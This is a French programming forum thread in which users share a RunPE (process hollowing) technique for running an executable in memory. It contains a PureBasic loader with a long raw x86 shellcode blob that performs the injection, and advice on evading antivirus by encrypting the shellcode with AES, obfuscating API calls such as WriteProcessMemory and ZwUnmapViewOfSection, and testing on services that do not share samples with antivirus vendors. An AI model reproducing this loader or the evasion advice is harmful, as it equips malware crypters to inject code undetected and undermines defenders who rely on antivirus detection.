Recuperer des donnees d'un programme lance en runpe

[Marc56]

https://fr.wikipedia.org/wiki/Disque_virtuel
Pour Windows, cherches Diskpart

[celtic88]

les antivirus détecté ce genre de code car cette méthode généralement est utiliser dans les programmes malveillants comme les crypters ou les virus....
la soution :
1
tu compile ton runpe en dll et tu load la dll par mémoire ...
2
ou tu peux essayer avec un "shellcode" ,a l'époque, je me souviens qu'il ne le détecte pas!
voilla mon ancien shellcode :

Code : Tout sélectionner

Prototype.l Runpe(IntectedTo.s,*Filebuffer)

Runpe.Runpe = ?Shellcode

If ReadFile(0, "My_app_To_run_in_memory.exe") 
  length = Lof(0)  
  *MemoryID  = AllocateMemory(length) 
  If *MemoryID
    bytes = ReadData(0, *MemoryID, length)
  EndIf
  CloseFile(0)
EndIf

InjectTo.s{#MAX_PATH}
GetModuleFileName_(0,@InjectTo,#MAX_PATH)
Runpe(InjectTo,*MemoryID)

DataSection
  Shellcode:
  Data.b $60, $E8, $4E, $00, $00, $00, $6B, $00, $65, $00, $72, $00, $6E, $00, $65, $00, $6C, $00, $33, $00, $32, $00, $00, $00, $6E, $00, $74, $00, $64, $00, $6C, $00, $6C, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $5B, $8B, $FC, $6A, $42, $E8, $BB, $03, $00, $00, $8B, $54, $24, $28, $89, $11, $8B, $54, $24, $2C, $6A, $3E, $E8, $AA, $03, $00, $00, $89, $11, $6A, $4A, $E8, $A1, $03, $00, $00, $89, $39, $6A, $1E, $6A, $3C, $E8, $9D, $03, $00, $00, $6A, $22, $68, $F4, $00, $00, $00, $E8, $91, $03, $00, $00, $6A, $26, $6A, $24, $E8, $88, $03, $00, $00, $6A, $2A, $6A, $40, $E8, $7F, $03, $00, $00, $6A, $2E, $6A, $0C, $E8, $76, $03, $00, $00, $6A, $32, $68, $C8, $00, $00, $00, $E8, $6A, $03, $00, $00, $6A, $2A, $E8, $5C, $03, $00, $00, $8B, $09, $C7, $01, $44, $00, $00, $00, $6A, $12, $E8, $4D, $03, $00, $00, $68, $5B, $E8, $14, $CF, $51, $E8, $79, $03, $00, $00, $6A, $3E, $E8, $3B, $03, $00, $00, $8B, $D1, $6A, $1E, $E8, $32, $03, $00, $00, $6A, $40, $FF, $32, $FF, $31, $FF, $D0, $6A, $12, $E8, $23, $03, $00, $00, $68, $5B, $E8, $14, $CF, $51, $E8, $4F, $03, $00, $00, $6A, $1E, $E8, $11, $03, $00, $00, $8B, $09, $8B, $51, $3C, $6A, $3E, $E8, $05, $03, $00, $00, $8B, $39, $03, $FA, $6A, $22, $E8, $FA, $02, $00, $00, $8B, $09, $68, $F8, $00, $00, $00, $57, $51, $FF, $D0, $6A, $00, $E8, $E8, $02, $00, $00, $68, $88, $FE, $B3, $16, $51, $E8, $14, $03, $00, $00, $6A, $2E, $E8, $D6, $02, $00, $00, $8B, $39, $6A, $2A, $E8, $CD, $02, $00, $00, $8B, $11, $6A, $42, $E8, $C4, $02, $00, $00, $57, $52, $6A, $00, $6A, $00, $6A, $04, $6A, $00, $6A, $00, $6A, $00, $6A, $00, $FF, $31, $FF, $D0, $6A, $12, $E8, $A9, $02, $00, $00, $68, $D0, $37, $10, $F2, $51, $E8, $D5, $02, $00, $00, $6A, $22, $E8, $97, $02, $00, $00, $8B, $11, $6A, $2E, $E8, $8E, $02, $00, $00, $8B, $09, $FF, $72, $34, $FF, $31, $FF, $D0, $6A, $00, $E8, $7E, $02, $00, $00, $68, $9C, $95, $1A, $6E, $51, $E8, $AA, $02, $00, $00, $6A, $22, $E8, $6C, $02, $00, $00, $8B, $11, $8B, $39, $6A, $2E, $E8, $61, $02, $00, $00, $8B, $09, $6A, $40, $68, $00, $30, $00, $00, $FF, $72, $50, $FF, $77, $34, $FF, $31, $FF, $D0, $6A, $36, $E8, $47, $02, $00, $00, $8B, $D1, $6A, $22, $E8, $3E, $02, $00, $00, $8B, $39, $6A, $3E, $E8, $35, $02, $00, $00, $8B, $31, $6A, $22, $E8, $2C, $02, $00, $00, $8B, $01, $6A, $2E, $E8, $23, $02, $00, $00, $8B, $09, $52, $FF, $77, $54, $56, $FF, $70, $34, $FF, $31, $6A, $00, $E8, $10, $02, $00, $00, $68, $A1, $6A, $3D, $D8, $51, $E8, $3C, $02, $00, $00, $83, $C4, $0C, $FF, $D0, $6A, $12, $E8, $F9, $01, $00, $00, $68, $5B, $E8, $14, $CF, $51, $E8, $25, $02, $00, $00, $6A, $22, $E8, $E7, $01, $00, $00, $8B, $11, $83, $C2, $06, $6A, $3A, $E8, $DB, $01, $00, $00, $6A, $02, $52, $51, $FF, $D0, $6A, $36, $E8, $CE, $01, $00, $00, $C7, $01, $00, $00, $00, $00, $B8, $28, $00, $00, $00, $6A, $36, $E8, $BC, $01, $00, $00, $F7, $21, $6A, $1E, $E8, $B3, $01, $00, $00, $8B, $11, $8B, $52, $3C, $81, $C2, $F8, $00, $00, $00, $03, $D0, $6A, $3E, $E8, $9F, $01, $00, $00, $03, $11, $6A, $26, $E8, $96, $01, $00, $00, $6A, $28, $52, $FF, $31, $6A, $12, $E8, $8A, $01, $00, $00, $68, $5B, $E8, $14, $CF, $51, $E8, $B6, $01, $00, $00, $83, $C4, $0C, $FF, $D0, $6A, $26, $E8, $73, $01, $00, $00, $8B, $39, $8B, $09, $8B, $71, $14, $6A, $3E, $E8, $65, $01, $00, $00, $03, $31, $6A, $26, $E8, $5C, $01, $00, $00, $8B, $09, $8B, $51, $0C, $6A, $22, $E8, $50, $01, $00, $00, $8B, $09, $03, $51, $34, $6A, $46, $E8, $44, $01, $00, $00, $8B, $C1, $6A, $2E, $E8, $3B, $01, $00, $00, $8B, $09, $50, $FF, $77, $10, $56, $52, $FF, $31, $6A, $00, $E8, $2A, $01, $00, $00, $68, $A1, $6A, $3D, $D8, $51, $E8, $56, $01, $00, $00, $83, $C4, $0C, $FF, $D0, $6A, $36, $E8, $13, $01, $00, $00, $8B, $11, $83, $C2, $01, $89, $11, $6A, $3A, $E8, $05, $01, $00, $00, $8B, $09, $3B, $CA, $0F, $85, $33, $FF, $FF, $FF, $6A, $32, $E8, $F4, $00, $00, $00, $8B, $09, $C7, $01, $07, $00, $01, $00, $6A, $00, $E8, $E5, $00, $00, $00, $68, $D2, $C7, $A7, $68, $51, $E8, $11, $01, $00, $00, $6A, $32, $E8, $D3, $00, $00, $00, $8B, $11, $6A, $2E, $E8, $CA, $00, $00, $00, $8B, $09, $52, $FF, $71, $04, $FF, $D0, $6A, $22, $E8, $BB, $00, $00, $00, $8B, $39, $83, $C7, $34, $6A, $32, $E8, $AF, $00, $00, $00, $8B, $31, $8B, $B6, $A4, $00, $00, $00, $83, $C6, $08, $6A, $2E, $E8, $9D, $00, $00, $00, $8B, $11, $6A, $46, $E8, $94, $00, $00, $00, $51, $6A, $04, $57, $56, $FF, $32, $6A, $00, $E8, $86, $00, $00, $00, $68, $A1, $6A, $3D, $D8, $51, $E8, $B2, $00, $00, $00, $83, $C4, $0C, $FF, $D0, $6A, $22, $E8, $6F, $00, $00, $00, $8B, $09, $8B, $51, $28, $03, $51, $34, $6A, $32, $E8, $60, $00, $00, $00, $8B, $09, $81, $C1, $B0, $00, $00, $00, $89, $11, $6A, $00, $E8, $4F, $00, $00, $00, $68, $D3, $C7, $A7, $E8, $51, $E8, $7B, $00, $00, $00, $6A, $32, $E8, $3D, $00, $00, $00, $8B, $D1, $6A, $2E, $E8, $34, $00, $00, $00, $8B, $09, $FF, $32, $FF, $71, $04, $FF, $D0, $6A, $00, $E8, $24, $00, $00, $00, $68, $88, $3F, $4A, $9E, $51, $E8, $50, $00, $00, $00, $6A, $2E, $E8, $12, $00, $00, $00, $8B, $09, $FF, $71, $04, $FF, $D0, $6A, $4A, $E8, $04, $00, $00, $00, $8B, $21, $61, $C3, $8B, $CB, $03, $4C, $24, $04, $C3, $6A, $00, $E8, $F2, $FF, $FF, $FF, $68, $54, $CA, $AF, $91, $51, $E8, $1E, $00, $00, $00, $6A, $40, $68, $00, $10, $00, $00, $FF, $74, $24, $18, $6A, $00, $FF, $D0, $FF, $74, $24, $14, $E8, $CF, $FF, $FF, $FF, $89, $01, $83, $C4, $10, $C3, $E8, $22, $00, $00, $00, $68, $A4, $4E, $0E, $EC, $50, $E8, $4B, $00, $00, $00, $83, $C4, $08, $FF, $74, $24, $04, $FF, $D0, $FF, $74, $24, $08, $50, $E8, $38, $00, $00, $00, $83, $C4, $08, $C3, $55, $52, $51, $53, $56, $57, $33, $C0, $64, $8B, $70, $30, $8B, $76, $0C, $8B, $76, $1C, $8B, $6E, $08, $8B, $7E, $20, $8B, $36, $38, $47, $18, $75, $F3, $80, $3F, $6B, $74, $07, $80, $3F, $4B, $74, $02, $EB, $E7, $8B, $C5, $5F, $5E, $5B, $59, $5A, $5D, $C3, $55, $52, $51, $53, $56, $57, $8B, $6C, $24, $1C, $85, $ED, $74, $43, $8B, $45, $3C, $8B, $54, $28, $78, $03, $D5, $8B, $4A, $18, $8B, $5A, $20, $03, $DD, $E3, $30, $49, $8B, $34, $8B, $03, $F5, $33, $FF, $33, $C0, $FC, $AC, $84, $C0, $74, $07, $C1, $CF, $0D, $03, $F8, $EB, $F4, $3B, $7C, $24, $20, $75, $E1, $8B, $5A, $24, $03, $DD, $66, $8B, $0C, $4B, $8B, $5A, $1C, $03, $DD, $8B, $04, $8B, $03, $C5, $5F, $5E, $5B, $59, $5A, $5D, $C3, $C3, $00, $00, $00, $00
EndDataSection

bonne chance

[celtic88]

j ai oublier de préciser que le shellcode est détecté par l'antivirus il faut le crypter avec "AES"

[ChaudEf]

Merci je testerais ce soir
c'est quoi dans le datasection?

[celtic88]

il ya une autre methode de l injecter sans créer un nouveau process, j ai le code en c++

[celtic88]

Merci je testerais ce soir
c'est quoi dans le datasection?

code machine qui s'exécute direct dans le processeur

[Zorro]

Merci je testerais ce soir
c'est quoi dans le datasection?

code machine qui s'exécute direct dans le processeur

je crois que sa question concernait la Nature de ce code Machine (que fait 'il ? )

[celtic88]

je veux conseille d'éviter les "runpe" car il sont devenue des méthodes très anciens et il sont detectable même après l'injection et tu risque que ton programme soit considéré comme un virus.
ce genre de chose le mieux cest de les connaître seulement pour mieux vous protéger .

[celtic88]

Merci je testerais ce soir
c'est quoi dans le datasection?

code machine qui s'exécute direct dans le processeur

je crois que sa question concernait la Nature de ce code Machine (que fait 'il ? )

ban un runpe comme les autres seulement codé en opcode, tkt c est pas un "Ransomware"

[jmg49]

salut,

tu peux obfusquer ton RunPe facilement en cryptant l'appel des api CreateProcessW, GetThreadContext, ReadProcessMemory c'est ça que les anti-virus n'aiment pas ,

exemple pas trop détaillé je vais encore me faire crier dessus

déjà , avec cette méthode , envoi ton exe sur nodistribute PAS VIRUSTOTAL par respect pour ceux qui bossent dans l'indétection ça devrait envoyer certains dans le vent, virustotal = collabo , ton code part chez les anti virus pour enrichir leur bases de détections virales.

Code : Tout sélectionner

hKernel32 = OpenLibrary(1, "kernel32.dll")
hNtdll = OpenLibrary(2, "ntdll.dll")

CallFunction(1, "WriteProcessMemory", pi\hProcess, Ctx\Ebx + 8, @lpBaseAddres, 4, #NUL)
CallFunction(2, "ZwUnmapViewOfSection" ,,Pi\hProcess, Addr)    : Goto EndThread : EndIf

ça ne suffit pas évidemment pour rendre un RunPE indétecté,

si tu veux quelques conseils ce sera en mp avec plaisir, c'est de la recherche et du travail foutu en l'air en 2 jours par virustotal sinon,


le shellcode est également toujours une bonne méthode,

j'en profite pour laisser un lien d'un compagnon de la scène malware repassé du bon côté qui a mis au point un détecteur de RunPE, très intéressant pour savoir si on est infecté ! croyez moi pour le bypasser celui-là faut s'accrocher !!

https://www.phrozen.io/page/runpe-detector-version-2